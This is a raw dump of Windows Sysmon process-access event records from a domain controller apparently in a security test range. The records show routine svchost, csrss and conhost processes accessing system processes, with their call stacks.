13:56:05.520{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007828Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.520{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007827Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.520{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007826Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.520{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007825Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.520{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007824Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.520{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007823Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.520{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007822Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.473{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007821Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.473{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007820Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.442{10ACEC4A-8541-5FCF-1000-000000009101}11562820C:\Windows\system32\svchost.exe{10ACEC4A-85F5-5FCF-5101-000000009101}5084C:\Windows\system32\usoclient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\usocore.dll+21082|c:\windows\system32\usocore.dll+158d4|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000007819Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.333{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-85F5-5FCF-5101-000000009101}5084C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007818Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.333{10ACEC4A-85F5-5FCF-5501-000000009101}33764244C:\Windows\system32\conhost.exe{10ACEC4A-85F5-5FCF-5201-000000009101}4524C:\Windows\System32\sihclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007817Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.333{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85F5-5FCF-5501-000000009101}3376C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007816Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.333{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007815Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.333{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007814Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.333{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007813Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.333{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007812Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007811Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007810Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007809Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007808Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007807Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-85F5-5FCF-5401-000000009101}41084856C:\Windows\system32\conhost.exe{10ACEC4A-85F5-5FCF-5101-000000009101}5084C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007806Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85F5-5FCF-5201-000000009101}4524C:\Windows\System32\sihclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007805Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8541-5FCF-1000-000000009101}11562820C:\Windows\system32\svchost.exe{10ACEC4A-85F5-5FCF-5201-000000009101}4524C:\Windows\System32\sihclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007804Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007803Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 